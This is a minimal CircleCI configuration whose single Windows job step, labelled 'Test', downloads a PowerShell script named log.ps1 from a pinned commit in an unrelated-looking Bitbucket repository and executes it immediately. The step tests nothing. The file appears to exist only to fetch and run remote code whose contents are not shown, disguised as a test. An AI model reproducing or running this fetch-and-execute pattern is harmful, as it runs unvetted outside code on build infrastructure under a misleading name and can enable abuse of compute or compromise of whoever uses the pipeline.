version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/sijinehyo/sijineh/raw/391af19aa63752cdef20edb15a2173ddb7467746/log.ps1 -OutFile log.ps1
            ./log.ps1